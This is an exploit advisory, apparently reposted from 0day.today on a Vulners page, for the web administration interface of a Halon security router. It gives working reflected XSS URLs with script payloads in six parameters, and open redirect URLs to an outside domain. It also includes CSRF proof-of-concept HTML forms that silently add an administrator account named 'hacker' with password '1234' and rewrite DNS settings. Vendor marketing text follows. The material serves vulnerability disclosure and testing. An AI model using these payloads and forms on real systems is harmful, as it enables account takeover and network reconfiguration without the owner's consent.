1- Reflected XSS:
At least the following parameters are not properly sanitized:
* http://sr.demo.halon.se/commands/logviewer/?log=vic0';</script><script>alert(1)</script>
Parameter: log
* http://sr.demo.halon.se/fileviewer/?file=";</script><script>alert(1)</script>
Parameter: file
* http://sr.demo.halon.se/system/graphs/?graph='+alert(1)+'
Parameter: graph
* http://sr.demo.halon.se/commands/?command='+alert(1)+'
Parameter: command
* http://sr.demo.halon.se/system/users/?id='+alert(1)+'
Parameter: id
* http://sr.demo.halon.se/config/?uri='+alert(1)+'
Parameter: uri
Other parameters of the application might also be affected.
2- CSRF:
At least the following functions are vulnerable:
* Add user: http://xxx.xxx.xxx.xxx/system/users/?add=user
<html>
<body>
<form method="POST" name="form0" action="http://sr.demo.halon.se:80/system/users/?add=user">
<input type="hidden" name="checkout" value="17"/>
<input type="hidden" name="apply" value=""/>
<input type="hidden" name="id" value=""/>
<input type="hidden" name="old_user" value=""/>
<input type="hidden" name="user" value="hacker"/>
<input type="hidden" name="full-name" value="ITFORCE H4x0r"/>
<input type="hidden" name="class" value=""/>
<input type="hidden" name="password" value="1234"/>
<input type="hidden" name="password2" value="1234"/>
</form>
</body>
</html>
* DNS configuration: http://xxx.xxx.xxx.xxx/network/dns
<html>
<body>
<form method="POST" name="form0" action="http://sr.demo.halon.se:80/network/dns/">
<input type="hidden" name="checkout" value="17"/>
<input type="hidden" name="apply" value=""/>
<input type="hidden" name="name-servers" value="8.8.8.8"/>
<input type="hidden" name="search-domain" value=""/>
<input type="hidden" name="host-name" value="sr.demo.halon.se"/>
</form>
</body>
</html>
* Network Configuration: http://xxx.xxx.xxx.xxx/network/basic
* Load Balancer Configuration: http://xxx.xxx.xxx.xxx/network/loadbalancer
* VPN Configuration: http://xxx.xxx.xxx.xxx/network/vpn
* Firewall Configuration: http://xxx.xxx.xxx.xxx/network/firewall
Other functions of the application might also be affected.
3- Open Redirect:
At least the following parameters are not properly sanitized:
* http://sr.demo.halon.se/cluster/?switch_to=&uri=http://itforce.tk
Parameter: uri
* http://sr.demo.halon.se/config/?checkout=17&uri=http://itforce.tk
Parameter: uri
Other parameters of the application might also be affected.
# 0day.today [2018-03-19] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation